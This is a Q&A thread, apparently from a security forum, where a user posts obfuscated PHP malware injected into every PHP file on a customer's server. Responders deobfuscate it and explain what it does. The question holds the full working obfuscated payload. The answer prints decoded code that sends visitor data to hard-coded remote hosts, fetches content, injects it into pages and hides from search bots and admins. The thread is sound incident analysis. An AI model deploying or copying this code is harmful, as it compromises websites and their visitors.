26

I found the code below on my customers site. It looks like a typical backdoor hidden with hexadecimal, but I'm not 100% sure.

<?php if (!isset($GLOBALS["\x61\156\x75\156\x61"]))
{
    $ua = strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]);
    if ((!strstr($ua, "\x6d\163\x69\145")) and (!strstr($ua, "\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"] = 1;
} ?><?php $zdsnpbzghe = 'x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>5c%x7860QUUI&e_SEEB%x5-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%xX;%x5c%x7860msvd}R;*msv%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutC%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x7825of.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x55c%x7825tww**WYsboepn)%x5c%x78258:}334}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]258]y6g]273]y76]2715hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x786]267]y74]275]y7:]268]y7f#<!%x5c%x7825tww!>!)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5464]284]364]6]234]342]58]24]31#-%x5782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%fmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c#)fepmqyf%x5c%x7827*&7-n%x5c%x7860hfsq)!sp!*#ojneb#-278]225]241]334]368]322]3]364]6]2{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%160%x28%42%x66%152%x66%147%x67%42%x2c%163%y35]256]y76]72]y3d]51]y35]274]y4:]82ovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7c%x7825iN}#-!tussfw)%x!isset($GLOBALS["%x61%156%x75%156%x61"])))) %x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvsox7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c!<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bub6<.3%x5c%x7860hA%x5c%x7827pd%x5c%x78256%x7825:|:*r%x5c%x7825:-t%x5c%x782%x782f#%x5c%x7825#%x5c%xx7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;7824-%x5c%x7824]y8%x5cx7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%jyf%x5c%x7860439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:OBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojRx5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x7824-tus85csboe))1%x5c%x782f3g%x5c%x7825)!gj!~<ofmyx5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%xx7825b:<!%x5c%x7825c:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!%x5c%787f_*#fubfsdXk5%x5c%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273]y76]258x7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c3:]68]y76#<%x5c%x78e%x5c%x78b,;uqpuft%x5c%x7860msvd}+;!>!}%x5c%%x5c%x7860TW~%x5c%x7824<%xx7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7317]445]212]445]43]321]87f<*X&Z&S{ftmfV%x5c%x78%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)+opjudc%x7825:<**#57]38y]47]67y]37]88y]27]28yx7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x59]274]y85]273]y6g]273]y76]%x5c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*!osvufs}w;*%x5c%x787f!>>%x5c%x7822!pd%x5x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*o%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#uj4]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]Dx7825zB%x5c%x7825z>!HB%x5c%x7860SFTV%x5c%x7860QUUIy76]61]y33]68]y34]68]ypd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x78786<x7860opjudovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGT%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7gA%x5c%x7827doj%x5c%x78256<%xc%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825!<***fufs:~:<*9-1-r%x5c%x7825)s%x5c!>!#]y84]275]y83]273]y76]277fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860ufldpt}c%x7825!<*#}_;#)323ldfid>}&;!osvufs}825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%xgj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fmjc%x7827rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-278256<.msv%x5c%x7860dz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z5297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D8]86]y31]285]82]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", NULL); };)gj}l;33bq}k;opjudovg}%xif((function_exists("%x6f%142%x5f%163%x74%141%x72%164") && (x74%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%16x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{56<pd%x5c%x7825w6Z6<.4*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%x5c%25mm)%x5c%x7825%x5c%ubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<%x7824-%x5c%x7824]26%x5c%x5c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!2272qj%x5c%x7825)7gj6<**2qj%x5c%x7825x5c%x7825Z<^2%x5c%x785c7%x65","%x65%166%x61%154%]#%x5c%x782fr%x5c%x7825%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x786027,*b%x5c%x7827)fepd787f%x5c%x787f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x7x7860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>%x5c7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5cftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]37]%x5c%x7825,3,j%x5c%x7825>j%x7824]25%x5c%x7824-%x5#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,2824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#mhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825{ $GLOBALS["%x61%156%x75%156%x61"]=1; function fjfgg($n){return chr(ox5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x:h%x5c%x7825:<#64y]5>}R;msv}.;%x5c%x782f#%x5c%x7W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%7!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)t&b%x5c%x7825!|!*)323zbek!~!#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuop%x7825>%x5c%x782fh%x581]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%xx28%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%155%x61]47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5c256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x75c%x78e%x5c%x78b%x5c%x78!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%7R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R37,18Rc%x7825!<*::::::-111112)eobs%x5c%x7860un%x7824-%x5c%x7824<%x5c78]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f5]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x78255.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%#<%x5c%x7825t2w>#]y74]273]y76]252]y85]256]y6g]257]y8)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x7825)%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x78c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFb:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!%x782f20QUUI7jsv%x5c%x78257UFH#%x5%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2b%x*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5c%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860hAx5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=trd($n)-1);} @error_reporting(0); preg_replace("%x2f%50%x2e%52%x29%585cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]DwN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x782]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%5c%x7878;0]=])0#)U!%x5c%x7827z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5c7;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5c%x7825cB%x5D#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgPdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x78c%x782f+*0f(-!#]y76]277]y72]265j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%825i%x5c%x785c2^<!Ce*[!%x5cpqsut>j%x5c%x7825!*9!%x5c%x7827!hmqj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj83]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]ojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw5%x3a%146%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y4]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5c%x7825tmw5]y39]271]y83]256]y78]248]y83]256]y81]265]y72]254]822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%xbss-%x5c%x7825r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<C%E{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]28c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x7>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#>]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnx5c%x7825)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x5c%x7860msvd}x5c%x7824<!%x5c%x7825tzw>!#]y76]277]y72]265]y35c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x782x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7822b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x75c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>25)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}85c%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x7826<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubfs2fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%>1*!%x5c%x7825b:>1<!fmtf!%x5c%x78255c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x7825wc%x7824-!%x5c%x7825%25hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%xj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>%x782f7&6|7**111127-K)qpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%%x5c%x7824-%x5c%x7824*<!%x5c%x7824c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osv>qp%x5c%x7825!|Z~!<##!>!2p%x%x7825z>2<!%x5c%x7825ww2)%x5c%x7825wbd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x56*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7882f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x78257%x5c%x782f7#@#7%x5c%x782f7^#i33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y271]y7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!>!#]y8%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825t%x5c%x7827pd%x5c%x782%x5c%x787f;!opjudovg}k~~9{d%-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7825f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+f52]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%x5c%x7825<#462<b%x5c%x7825%x5c%x787f!<X>b!|ftmf!~<**9.-j%x5c%x7825/(.*)/epreg_replacepcxbdxfawf';
$ibnuwgraod = explode(chr((272 - 228)) , '3721,60,1040,44,4913,69,6639,67,4175,25,5385,67,880,43,3781,56,7594,63,2006,29,6509,67,9756,21,3876,22,3532,51,1285,39,7868,58,1712,52,728,25,4442,69,9108,22,2767,44,228,65,6997,43,6357,34,3325,57,7457,39,8745,65,7272,52,4115,37,6100,56,3099,58,9571,37,3965,46,5581,53,6706,36,6742,41,3382,20,4551,40,1898,21,3499,33,3278,47,2964,29,8908,59,5905,39,2357,64,2864,35,1560,42,2525,52,7557,37,9442,64,4231,63,3157,41,144,24,8232,66,2035,34,1381,47,2421,40,3459,40,2811,53,10081,25,9805,67,3234,44,8344,64,5127,59,7423,34,1690,22,4651,27,2461,64,686,42,1241,44,7926,62,8163,69,2701,66,1205,36,4152,23,8472,39,6391,63,8572,47,9385,57,2993,49,6156,47,4294,20,293,52,5774,40,9321,28,8682,63,9935,55,4819,47,753,27,3898,47,1150,55,5322,63,68,22,6203,43,2649,30,5186,27,10054,27,4077,38,9872,63,540,58,1764,70,8115,48,5040,28,9506,65,3198,36,9777,28,168,60,1500,60,6454,55,2180,69,959,59,7763,53,4314,60,2156,24,4011,42,4700,58,5717,57,5213,38,7155,53,4374,68,3837,39,3696,25,6922,29,813,67,1357,24,633,53,8298,46,2331,26,9651,66,7657,56,3071,28,6048,52,496,44,9279,42,3042,29,5251,21,2249,39,4200,31,8810,63,0,68,5020,20,9990,64,5452,59,1324,33,8619,63,377,70,6876,46,4678,22,8967,20,8408,64,7354,42,1602,67,9130,66,4982,38,1428,22,4053,24,5814,22,2899,65,9196,34,90,54,4511,40,6292,65,8066,49,923,36,7095,60,1018,22,8511,61,7396,27,1084,66,5658,59,2629,20,4866,47,6832,44,447,49,8987,69,345,32,7816,52,5272,50,3583,53,5836,38,5511,70,7208,64,6783,49,2577,52,7988,39,5874,31,1969,37,9717,39,3402,57,4591,60,780,33,7496,61,2133,23,598,35,8027,39,1669,21,5991,57,1450,50,6576,63,9056,52,8873,35,6246,46,1834,64,2288,43,9230,49,5944,47,6951,46,9349,36,2069,26,5634,24,3945,20,2095,38,4758,61,5068,59,1919,50,7040,55,7324,30,7713,50,2679,22,9608,43,3636,60');
$hlrywdpqbc = substr($zdsnpbzghe, (44960 - 34854) , (41 - 34));
if (!function_exists('kscpwxzuhr'))
{
    function kscpwxzuhr($xjucvuiret, $bsoixxpekh)
    {
        $uzadkdkdcj = NULL;
        for ($ylffdjxxwv = 0;$ylffdjxxwv < (sizeof($xjucvuiret) / 2);$ylffdjxxwv++)
        {
            $uzadkdkdcj .= substr($bsoixxpekh, $xjucvuiret[($ylffdjxxwv * 2) ], $xjucvuiret[($ylffdjxxwv * 2) + 1]);
        }
        return $uzadkdkdcj;
    };
}
$jztylhmlin = "\x20\57\x2a\40\x74\150\x6f\157\x63\172\x77\144\x78\152\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\60\x36\55\x31\66\x39\51\x29\54\x20\143\x68\162\x28\50\x32\71\x35\55\x32\60\x33\51\x29\54\x20\153\x73\143\x70\167\x78\172\x75\150\x72\50\x24\151\x62\156\x75\167\x67\162\x61\157\x64\54\x24\172\x64\163\x6e\160\x62\172\x67\150\x65\51\x29\51\x3b\40\x2f\52\x20\156\x6f\153\x7a\142\x6d\165\x76\165\x6e\40\x2a\57\x20";
$nbbppijzpp = substr($zdsnpbzghe, (68445 - 58332) , (68 - 56));
$nbbppijzpp($hlrywdpqbc, $jztylhmlin, NULL);
$nbbppijzpp = $jztylhmlin;
$nbbppijzpp = (752 - 631);
$zdsnpbzghe = $nbbppijzpp - 1; ?>

If it actually is a backdoor, I'm curious about what it does, if someone's got the patient to interpret it.

EDIT:

My customer isn't involved in web development, and when I asked him about this code he'd certainly not seen it before.

I noticed now that the code is placed in the top of almost every file in a WordPress installation, as it would have been placed there automatically.

EDIT 2:

The malicious code were in fact placed in every PHP file on the server, not only within WordPress.

bad_coder
  • 129
  • 4
Ivar
  • 363
  • 1
  • 3
  • 7
  • This is definitely a malicious file and it seems to be more complicated to decode than others I have seen. – gen_Eric Oct 13 '14 at 19:17
  • 1
    This is a doubly obfuscated code that uses both octal and hexadecimal escape sequences and does code execution using `preg_replace` "\e" modifier. You can lookup [this table](http://www.asciitable.com/) to decode the escaped characters or find a convertor that can do both at once to ease your workload and work your way through. It is quite tedious work. – Question Overflow Oct 14 '14 at 10:35
  • 2
    @QuestionOverflow: What you describe is only the beginning. The code is encoded (or primitively encrypted) about six times using substitutions and transpositions. I have decoded it but unfortunately at the end the execution flow is unclear to me. I am not much familiar with PHP. At the end the code uses multiple calls to `create_function()` to define lambda functions but the return values (I think necessary to call the functions) do not seem to be used. – pabouk - Ukraine stay strong Oct 14 '14 at 13:02
  • 1
    @pabouk, that's because I am stuck at stage 2 `eval(implode(array_map("fjfgg",str_split("\x25u:f!>!(\x25\x78:!>#]`. Don't know how to proceed after that. Maybe stackoverflow PHP experts can help :) – Question Overflow Oct 14 '14 at 13:08
  • 3
    @QuestionOverflow: It is not practical to decode all the strings manually. It is much much more practical to run the code directly and replace the the parts which execute the decoded code by commands which print it. Though to find the parts you have to decode some strings. To do this the most practical for me is to use the interactive command prompt of PHP. – pabouk - Ukraine stay strong Oct 14 '14 at 13:08
  • @pabouk, yes, you are right. I realize that too after commenting. Haven't seriously try to deobfuscate a code before this one. Just an `echo` will do the job. – Question Overflow Oct 14 '14 at 13:11
  • @QuestionOverflow Just replace `eval` by `print` and do not forget to include the definition of the function `fjfgg()` from the previous code. – pabouk - Ukraine stay strong Oct 14 '14 at 13:11
  • @pabouk, since you have already decoded it, why not show us the solution? At least it would be worth an upvote from me. Others can chip in too to decipher what it actually does. – Question Overflow Oct 14 '14 at 13:32
  • Let us [continue this discussion in chat](http://chat.stackexchange.com/rooms/17867/discussion-between-pabouk-and-question-overflow). – pabouk - Ukraine stay strong Oct 14 '14 at 13:34
  • Thank you both. As we've agreed on that this code is malicious I'll make a new, fresh installation of WordPress and change all passwords. If you've got the interest and actually decodes the code, please let me know, it would be interesting to see what the code actually does. I hate that there's no answer to accept, though. – Ivar Oct 14 '14 at 16:13
  • tried your script. seems to have lost ?php from the beginning of all the files ? also saw this error while running: ./php_fix.sh: line 27: }: command not found cp: with --parents, the destination must be a directory – brian Nov 04 '14 at 23:36

1 Answers1

47

No. The backdoor is not on this script. This piece of highly obfuscated code contains a program to allow the hacker to dynamically append any HTML or javascript by randomly calling a server located at 31.184.192.250 with one of the four hostnames "33db9538.com", "9507c4e8.com", "e5b57288.com", "54dfa1cb.com".

The deobfuscated code looks something like this:

// generate hostname
function random($arr, $qw) {
    $arr = array("33db9538", "9507c4e8", "e5b57288", "54dfa1cb");
    return $arr[rand(0, 1.125)].$qw;
}

// return hostname of malware-hosting server
function cqq($qw)
{
    return random($domarr, $qw);
}

// custom encoding
function en2($s, $q)
{
    $g = "";
    while (strlen($g) < strlen($s)) {
        $q = pack("H*", md5($g.$q."q1w2e3r4")); # convert to binary string
        $g.= substr($q, 0, 8);
    }
    return $s^$g; # XOR, bits set in either $s or $g but not both
}

// g_* functions are four different ways to retrieve content from remote URL
function g_1($url)
{
    if(function_exists("file_get_contents") === false) return false;
    $buf = @file_get_contents($url);
    if($buf == "") return false;
    return $buf;
}

function g_2($url)
{
    if(function_exists("curl_init") === false) return false;
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    $res = curl_exec($ch);
    curl_close($ch);
    if($res == "") return false;
    return $res;
}
....

// try progressively more complicated method if the previous one did not work
function gtd($url)
{
    $co = "";
    $co = @g_1($url);
    if($co !== false) return $co;
    $co = @g_2($url);
    if($co !== false) return $co;
    $co = @g_3($url);
    if($co !== false) return $co;
    $co = @g_4($url);
    if($co !== false) return $co;
    return "";
}

// encode server parameters
function k34($op, $text)
{
    return base64_encode(en2($text, $op));
}

// check if server parameters exist
function check212($param)
{
    if(!isset($_SERVER[$param])) $a = "non";
    else if($_SERVER[$param] == "") $a = "non";
    else $a = $_SERVER[$param];
    return $a;
}

// extract payload
function day212()
{
    $a = check212("HTTP_USER_AGENT");
    $b = check212("HTTP_REFERER");
    $c = check212("REMOTE_ADDR");
    $d = check212("HTTP_HOST");
    $e = check212("PHP_SELF");
    $domarr = array("33db9538", "9507c4e8", "e5b57288", "54dfa1cb");
    if(($a == "non") or ($c == "non") or ($d == "non") or strrpos(strtolower($e), "admin")
     or (preg_match("/google|slurp|msnbot|ia_archiver|yandex|rambler/i", strtolower($a))))
    {
        $o1 = "";
    }
    else {
        $op = mt_rand(100000, 999999);
        $g4 = $op."?".urlencode(urlencode(k34($op, $a).".".k34($op, $b).".".k34($op, $c)
         .".".k34($op, $d).".".k34($op, $e)));
        $url = "http://".cqq(".com")."/".$g4;
        $ca1 = en2(@gtd($url) , $op);
        $a1 = @explode("!NF0", $ca1);
        if(sizeof($a1) >= 2) $o1 = $a1[1];
        else $o1 = "";
    }
    return $o1;
}

// uncompress html to buffer
function dcoo($cz, $length = null)
{
    if(false !== ($dz = @gzinflate($cz))) return $dz;
    if(false !== ($dz = @comgzi($cz))) return $dz;
    if(false !== ($dz = @gzuncompress($cz))) return $dz;
    if(function_exists("gzdecode")) {
        $dz = @gzdecode($cz);
        if(false !== $dz) return $dz;
    }
    return $cz;
}

// callback function to accept buffer and append code at bottom of html
function pa22($v)
{
    Header("Content-Encoding: none");
    $t = dcoo($v);
    if(preg_match("/\<\/body/si", $t)) {
        return preg_replace("/(\<\/body[^\>]*\>)/si", day212()."\n$1", $t, 1);
    }
    else {
        if(preg_match("/\<\/html/si", $t)) {
            return preg_replace("/(\<\/html[^\>]*\>)/si", day212()."\n$1", $t, 1);
        }
        else {
            return $t;
        }
    }
}

// start processing
ob_start("pa22");

/**** original code starts here ****/
....

The code above is capable of evading detection by major search engines and site administrator as it returns a normal page when certain criteria are matched. I am not able to find out what code is being appended possibly because the malware-hosting server also does some check to see if the request is coming from an infected server.

It appears that a Wordpress vulnerability was introduced by an unpatched version of the MailPoet plugin. This allows a hacker to upload a malicious script with the credential of an administrator into a Wordpress theme and execute that file by navigating to the URL. You can find more information from this security blog.

The key takeaway from this incident is to backup your data frequently and update your software conscientiously.

Question Overflow
  • 5,220
  • 6
  • 27
  • 48
  • Sorry about the delay, and thanks alot for your effort. It's really interesting to se what the code does. – Ivar Jan 13 '15 at 15:00
  • Could you go into any detail about what tools you used to deobfuscate this? – Ryan Oct 15 '15 at 01:33
  • We recently got hit by this. We have never used the MailPoet plugin. Does anyone know of any other possible vulnerable plugins? – Kenny Oct 15 '15 at 20:21
  • I think older unpatched versions of Akismet are exposed as well as some less-well-written plugins. Akismet has a facility to allow comments to have files appended and this is how the malware gets itself onto your server. – Robin Layfield Nov 01 '15 at 05:55